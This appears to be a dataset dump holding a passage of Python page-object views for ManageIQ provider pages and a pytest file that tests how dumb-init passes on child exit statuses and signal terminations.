return (super(CloudProviderDetailsView, self).is_displayed and
self.navigation.currently_selected == ['Compute', 'Clouds', 'Providers'])
class MiddlewareProviderDetailsView(ProviderDetailsView):
"""
Middleware Details page
"""
@property
def is_displayed(self):
return (super(MiddlewareProviderDetailsView, self).is_displayed and
self.navigation.currently_selected == ['Middleware', 'Providers'])
class ProviderTimelinesView(TimelinesView, BaseLoggedInPage):
"""
represents Timelines page
"""
@property
def is_displayed(self):
return (self.logged_in_as_current_user and
self.navigation.currently_selected == ['Compute', 'Infrastructure', 'Providers'] and
TimelinesView.is_displayed)
class InfraProvidersDiscoverView(BaseLoggedInPage):
"""
Discover View from Infrastructure Providers page
"""
title = Text('//div[@id="main-content"]//h1')
vmware = Checkbox('discover_type_virtualcenter')
scvmm = Checkbox('discover_type_scvmm')
rhevm = Checkbox('discover_type_rhevm')
from_ip1 = Input('from_first')
from_ip2 = Input('from_second')
from_ip3 = Input('from_third')
from_ip4 = Input('from_fourth')
to_ip4 = Input('to_fourth')
start = Button('Start')
cancel = Button('Cancel')
@property
def is_displayed(self):
return (self.logged_in_as_current_user and
self.navigation.currently_selected == ['Compute', 'Infrastructure', 'Providers'] and
self.title.text == 'Infrastructure Providers Discovery')
class CloudProvidersDiscoverView(BaseLoggedInPage):
"""
Discover View from Infrastructure Providers page
"""
title = Text('//div[@id="main-content"]//h1')
discover_type = BootstrapSelect('discover_type_selected')
fields = ConditionalSwitchableView(reference='discover_type')
@fields.register('Amazon EC2', default=True)
class Amazon(View):
username = Input(name='userid')
password = Input(name='password')
confirm_password = Input(name='verify')
@fields.register('Azure')
class Azure(View):
client_id = Input(name='client_id')
client_key = Input(name='client_key')
tenant_id = Input(name='azure_tenant_id')
subscription = Input(name='subscription')
start = Button('Start')
cancel = Button('Cancel')
@property
def is_displayed(self):
return (self.logged_in_as_current_user and
self.navigation.currently_selected == ['Compute', 'Clouds', 'Providers'] and
self.title.text == 'Cloud Providers Discovery')
class ProvidersManagePoliciesView(BaseLoggedInPage):
"""
Provider's Manage Policies view
"""
policies = VersionPick({Version.lowest(): DynaTree('protect_treebox'),
'5.7': BootstrapTreeview('protectbox')})
@View.nested
class entities(BaseNonInteractiveEntitiesView): # noqa
@property
def entity_class(self):
return ProviderEntity().pick(self.browser.product_version)
save = Button('Save')
reset = Button('Reset')
cancel = Button('Cancel')
@property
def is_displayed(self):
return False
class NodesToolBar(View):
"""
represents nodes toolbar and its controls (exists for Infra OpenStack provider)
"""
configuration = Dropdown(text='Configuration')
policy = Dropdown(text='Policy')
power = Dropdown(text='Power')
download = Dropdown(text='Download')
view_selector = View.nested(ItemsToolBarViewSelector)
class ProviderNodesView(BaseLoggedInPage):
"""
represents main Nodes view (exists for Infra OpenStack provider)
"""
title = Text('//div[@id="main-content"]//h1')
toolbar = View.nested(NodesToolBar)
including_entities = View.include(HostEntitiesView, use_parent=True)
@property
def is_displayed(self):
title = '{name} (All Managed Hosts)'.format(name=self.context['object'].name)
return (self.logged_in_as_current_user and
self.navigation.currently_selected == ['Compute', 'Infrastructure', 'Providers'] and
self.title.text == title)
class ProviderToolBar(View):
"""
represents provider toolbar and its controls
"""
configuration = Dropdown(text='Configuration')
policy = Dropdown(text='Policy')
authentication = Dropdown(text='Authentication')
download = Dropdown(text='Download')
view_selector = View.nested(ItemsToolBarViewSelector)
class ProviderSideBar(View):
"""
represents left side bar. it usually contains navigation, filters, etc
"""
pass
class ProviderEntitiesView(BaseEntitiesView):
"""
represents child class of Entities view for Provider entities
"""
@property
def entity_class(self):
return ProviderEntity().pick(self.browser.product_version)
class ProvidersView(BaseLoggedInPage):
"""
represents Main view displaying all providers
"""
@property
def is_displayed(self):
return self.logged_in_as_current_user
paginator = PaginationPane()
toolbar = View.nested(ProviderToolBar)
sidebar = View.nested(ProviderSideBar)
including_entities = View.include(ProviderEntitiesView, use_parent=True)
class ContainersProvidersView(ProvidersView):
"""
represents Main view displaying all Containers providers
"""
table = Table(locator="//div[@id='list_grid']//table")
@property
def is_displayed(self):
return (super(ContainersProvidersView, self).is_displayed and
self.navigation.currently_selected == ['Compute', 'Containers', 'Providers'] and
self.entities.title.text == 'Containers Providers')
class InfraProvidersView(ProvidersView):
"""
represents Main view displaying all Infra providers
"""
@property
def is_displayed(self):
return (super(InfraProvidersView, self).is_displayed and
self.navigation.currently_selected == ['Compute', 'Infrastructure', 'Providers'] and
self.entities.title.text == 'Infrastructure Providers')
class CloudProvidersView(ProvidersView):
"""
represents Main view displaying all Cloud providers
"""
@property
def is_displayed(self):
return (super(CloudProvidersView, self).is_displayed and
self.navigation.currently_selected == ['Compute', 'Clouds', 'Providers'] and
self.entities.title.text == 'Cloud Providers')
class MiddlewareProvidersView(ProvidersView):
"""
represents Main view displaying all Middleware providers
"""
@property
def is_displayed(self):
return (super(MiddlewareProvidersView, self).is_displayed and
self.navigation.currently_selected == ['Middleware', 'Providers'] and
self.entities.title.text == 'Middleware Providers')
class BeforeFillMixin(object):
"""
this mixin is used to activate appropriate tab before filling this tab
"""
def before_fill(self):
if self.exists and not self.is_active():
self.select()
class ProviderAddView(BaseLoggedInPage):
"""
represents Provider Add View
"""
title = Text('//div[@id="main-content"]//h1')
name = Input('name')
prov_type = BootstrapSelect(id='emstype')
zone = Input('zone')
flash = FlashMessages('.//div[@id="flash_msg_div"]/div[@id="flash_text_div" or '
'contains(@class, "flash_text_div")]')
add = Button('Add')
cancel = Button('Cancel')
@View.nested
class endpoints(View): # NOQA
# this is switchable view that gets replaced with concrete view.
# it gets changed according to currently chosen provider type
# look at cfme.common.provider.BaseProvider.create() method
pass
@property
def is_displayed(self):
return self.logged_in_as_current_user
class InfraProviderAddView(ProviderAddView):
api_version = BootstrapSelect(id='api_version') # only for OpenStack
@property
def is_displayed(self):
return (super(InfraProviderAddView, self).is_displayed and
self.navigation.currently_selected == ['Compute', 'Infrastructure', 'Providers'] and
self.title.text == 'Add New Infrastructure Provider')
class CloudProviderAddView(ProviderAddView):
"""
represents Cloud Provider Add View
"""
# bug in cfme this field has different ids for cloud and infra add views
prov_type = BootstrapSelect(id='ems_type')
region = BootstrapSelect(id='provider_region') # Azure/AWS/GCE
tenant_id = Input('azure_tenant_id') # only for Azure
subscription = Input('subscription') # only for Azure
project_id = Input('project') # only for Azure
# bug in cfme this field has different ids for cloud and infra add views
api_version = BootstrapSelect(id='ems_api_version') # only for OpenStack
keystone_v3_domain_id = Input('keystone_v3_domain_id') # OpenStack only
infra_provider = BootstrapSelect(id='ems_infra_provider_id') # OpenStack only
tenant_mapping = Checkbox(name='tenant_mapping_enabled') # OpenStack only
@property
def is_displayed(self):
return (super(CloudProviderAddView, self).is_displayed and
self.navigation.currently_selected == ['Compute', 'Clouds', 'Providers'] and
self.title.text == 'Add New Cloud Provider')
class ContainersProviderAddView(ProviderAddView):
"""
represents Containers Provider Add View
"""
prov_type = BootstrapSelect(id='ems_type')
@property
def is_displayed(self):
return (super(ProviderAddView, self).is_displayed and
self.navigation.currently_selected == ['Compute', 'Containers', 'Providers'] and
self.title.text == 'Add New Containers Provider')
class MiddlewareProviderAddView(ProviderAddView):
"""
represents Middleware Provider Add View
"""
@property
def is_displayed(self):
return (super(MiddlewareProviderAddView, self).is_displayed and
self.navigation.currently_selected == ['Middleware', 'Providers'] and
self.title.text == 'Add New Middleware Provider')
class ProviderEditView(ProviderAddView):
"""
represents Provider Edit View
"""
prov_type = Text(locator='//label[@name="emstype"]')
# only in edit view
vnc_start_port = Input('host_default_vnc_port_start')
vnc_end_port = Input('host_default_vnc_port_end')
flash = FlashMessages('.//div[@id="flash_msg_div"]/div[@id="flash_text_div" or '
'contains(@class, "flash_text_div")]')
save = Button('Save')
reset = Button('Reset')
cancel = Button('Cancel')
@property
def is_displayed(self):
return self.logged_in_as_current_user
class InfraProviderEditView(ProviderEditView):
"""
represents Infra Provider Edit View
"""
@property
def is_displayed(self):
return (super(InfraProviderEditView, self).is_displayed and
self.navigation.currently_selected == ['Compute', 'Infrastructure', 'Providers'] and
self.title.text == 'Edit Infrastructure Provider')
class CloudProviderEditView(ProviderEditView):
"""
represents Cloud Provider Edit View
"""
@property
def is_displayed(self):
return (super(CloudProviderEditView, self).is_displayed and
self.navigation.currently_selected == ['Compute', 'Clouds', 'Providers'] and
self.title.text == 'Edit Cloud Provider')
class ContainersProviderEditView(ProviderEditView):
"""
represents Containers Provider Edit View
"""
@property
def is_displayed(self):
return (super(ProviderEditView, self).is_displayed and
self.navigation.currently_selected == ['Compute', 'Containers', 'Providers'] and
self.title.text == 'Edit Containers Provider')
class MiddlewareProviderEditView(ProviderEditView):
"""
represents Middleware Provider Edit View
"""
@property
def is_displayed(self):
expected_title = ("Edit Middleware Providers '{name}'"
.format(name=self.context['object'].name))
return (super(MiddlewareProviderEditView, self).is_displayed and
self.navigation.currently_selected == ['Middleware', 'Providers'] and
self.title.text == expected_title)
|
import signal
import sys
from subprocess import Popen
import pytest
@pytest.mark.parametrize('exit_status', [0, 1, 2, 32, 64, 127, 254, 255])
@pytest.mark.usefixtures('both_debug_modes', 'both_setsid_modes')
def test_exit_status_regular_exit(exit_status):
"""dumb-init should exit with the same exit status as the process that it
supervises when that process exits normally.
"""
proc = Popen(('dumb-init', 'sh', '-c', 'exit {}'.format(exit_status)))
proc.wait()
assert proc.returncode == exit_status
@pytest.mark.parametrize(
'signal', [
signal.SIGTERM,
signal.SIGHUP,
signal.SIGQUIT,
signal.SIGKILL,
],
)
@pytest.mark.usefixtures('both_debug_modes', 'both_setsid_modes')
def test_exit_status_terminated_by_signal(signal):
"""dumb-init should exit with status 128 + signal when the child process is
terminated by a signal.
"""
# We use Python because sh is "dash" on Debian and "bash" on others.
# https://github.com/Yelp/dumb-init/issues/115
proc = Popen((
'dumb-init', sys.executable, '-c', 'import os; os.kill(os.getpid(), {})'.format(
signal,
),
))
proc.wait()
assert proc.returncode == 128 + signal
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.